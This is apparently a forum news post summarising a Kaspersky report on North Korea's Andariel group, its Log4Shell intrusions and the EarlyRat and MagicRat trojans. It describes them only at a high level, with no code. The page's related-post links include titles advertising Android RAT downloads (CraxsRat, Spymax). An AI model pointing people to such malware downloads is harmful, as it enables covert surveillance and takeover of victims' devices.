EarlyRat Malware Family
admin
admin 1 year ago
admin #news

EarlyRat : Hidden Malware Family Exposed By North Korean Hackers

Kaspersky Lab researchers have uncovered a previously undocumented malware family and identified operational errors committed by Andariel, a faction of the North Korean Lazarus Group. Kaspersky Lab, in its report, analyzed the tactics of the Andariel group and identified a new threat called "EarlyRat".

The Andariel group is known for using DTrack malware and Maui ransomware. Andariel first gained attention in mid-2022. Using the Log4Shell vulnerability, Andariel delivered various families of malware to target devices, including YamaBot and MagicRat, as well as updated versions of NukeSped and DTrack.


An investigation by Kaspersky Lab showed that Andariel initiates the infection by executing a Log4Shell exploit that downloads additional malware from a command and control server ( C2 server ).


It is noteworthy that the researchers observed the execution of commands by a human operator and noted numerous errors and typos, suggesting that an inexperienced attacker was behind the operation.


The researchers also identified a new malware family called EarlyRat. Initially, it was assumed that EarlyRat samples were downloaded via Log4Shell, but further analysis showed that phishing documents were the main delivery mechanism for EarlyRat.


EarlyRat, like many other remote access trojans ( RAT ), upon activation collects system information and transmits it to the C2 server in a specific pattern. The transmitted data includes unique computer identifiers (IDs) and requests that are encrypted using the cryptographic keys specified in the ID field.


In terms of functionality, EarlyRat is simple, mostly limited to executing commands. Interestingly, EarlyRat shares some common similarities with the Lazarus MagicRat malware. Similarities lie in the use of frameworks (QT for MagicRat and PureBasic for EarlyRat) and the limited functionality of both RAT Trojans.


MagicRAT was first seen on victim networks using VMware Horizon servers connected to the internet. According to the researchers, the Trojan was created using the Qt framework to make analysis more difficult and less likely to be detected by security systems.


To gain a foothold in the system, the Trojan creates scheduled tasks. The functionality of MagicRat is quite simple - the malware provides attackers with a remote shell that allows them to execute arbitrary commands and manipulate the victim's files.

0
592

Login to Post comments

Comments 0
CraxsRat - Android Rat Download

CraxsRat - Android Rat Download

1673775682.png
admin
 1 year ago
Malware Campaign Uncovered: Attackers Exploit YouTube to Distribute Aurora Infostealer

Malware Campaign Uncovered: Attackers Exploit YouTube to Distribute Au...

1673775682.png
admin
 1 year ago
Malware and Advanced Persistent Threats (APTs)

Malware and Advanced Persistent Threats (APTs)

1673775682.png
admin
 1 year ago
New malware Fractureiser threatens the safety of Minecraft players

New malware Fractureiser threatens the safety of Minecraft players

1673775682.png
admin
 1 year ago
Spymax Android RAT - Private Edition Download

Spymax Android RAT - Private Edition Download

1673775682.png
admin
 11 months ago